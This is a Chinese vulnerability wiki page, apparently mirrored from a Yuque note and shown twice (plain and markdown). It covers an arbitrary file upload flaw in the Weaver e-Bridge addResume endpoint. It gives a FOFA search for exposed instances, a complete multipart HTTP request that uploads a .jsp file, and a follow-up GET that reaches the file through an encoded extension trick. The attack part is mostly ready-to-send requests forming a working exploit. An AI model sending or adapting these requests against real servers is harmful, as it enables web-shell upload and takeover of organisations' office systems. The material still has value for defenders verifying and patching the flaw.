fofamini-wiki

登录白背景

源码

泛微云桥addResume存在任意文件上传漏洞

一、漏洞简介

泛微云桥e-Bridge 是一款办公自动化工具，主要提供文档管理、流程管理、协同办公、知识管理和移动办公等功能。它的目标是将企业内部的各种业务流程数字化，并通过云端技术实现跨部门、跨地域的协同办公和信息共享。泛微云桥addResume存在任意文件上传漏洞

二、影响版本

泛微云桥e-Bridge

三、资产测绘

fofaapp="泛微-云桥e-Bridge"
特征

四、漏洞复现

POST /wxclient/app/recruit/resume/addResume?fileElementld=H HTTP/1.1
Host: 
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary83Hl3B723UfEAUV0
Content-Length: 279

------WebKitFormBoundary83Hl3B723UfEAUV0
Content-Disposition: form-data; name="file";filename="1234.jsp"

123123
------WebKitFormBoundary83Hl3B723UfEAUV0
Content-Disposition: form-data; name="file";filename="1234.jsp"

123123
------WebKitFormBoundary83Hl3B723UfEAUV0--

http://ip/upload/202408/C/1234.js%70
url链接C处根据环境不同而变化。
1、有的环境是1个大写字母
2、有的环境是2个大写字母

GET /upload/202408/H/1234.js%70 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate

原文: https://www.yuque.com/xiaokp7/ocvun2/nmafkltva91zw296

# 泛微云桥addResume存在任意文件上传漏洞

# 一、漏洞简介
泛微云桥e-Bridge 是一款办公自动化工具，主要提供文档管理、流程管理、协同办公、知识管理和移动办公等功能。它的目标是将企业内部的各种业务流程数字化，并通过云端技术实现跨部门、跨地域的协同办公和信息共享。泛微云桥addResume存在任意文件上传漏洞

# 二、影响版本
+ 泛微云桥e-Bridge

# 三、资产测绘
+ fofa`app="泛微-云桥e-Bridge"`
+ 特征

![1711183622982-5261ce59-829d-48ed-abac-ee535921703d.png](./img/pSkbRqG_7_2TUxYu/1711183622982-5261ce59-829d-48ed-abac-ee535921703d-857328.png)

# 四、漏洞复现
```java
POST /wxclient/app/recruit/resume/addResume?fileElementld=H HTTP/1.1
Host: 
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary83Hl3B723UfEAUV0
Content-Length: 279

------WebKitFormBoundary83Hl3B723UfEAUV0
Content-Disposition: form-data; name="file";filename="1234.jsp"

123123
------WebKitFormBoundary83Hl3B723UfEAUV0
Content-Disposition: form-data; name="file";filename="1234.jsp"

123123
------WebKitFormBoundary83Hl3B723UfEAUV0--
```

![1722878025212-16295178-dc0c-4154-b6ae-016745c32c37.png](./img/pSkbRqG_7_2TUxYu/1722878025212-16295178-dc0c-4154-b6ae-016745c32c37-273704.png)

```java
http://ip/upload/202408/C/1234.js%70
url链接C处根据环境不同而变化。
1、有的环境是1个大写字母
2、有的环境是2个大写字母
```

```plain
GET /upload/202408/H/1234.js%70 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
```

![1722907943570-07cd41eb-203e-415d-81ad-e7b20fefc168.png](./img/pSkbRqG_7_2TUxYu/1722907943570-07cd41eb-203e-415d-81ad-e7b20fefc168-207016.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/nmafkltva91zw296>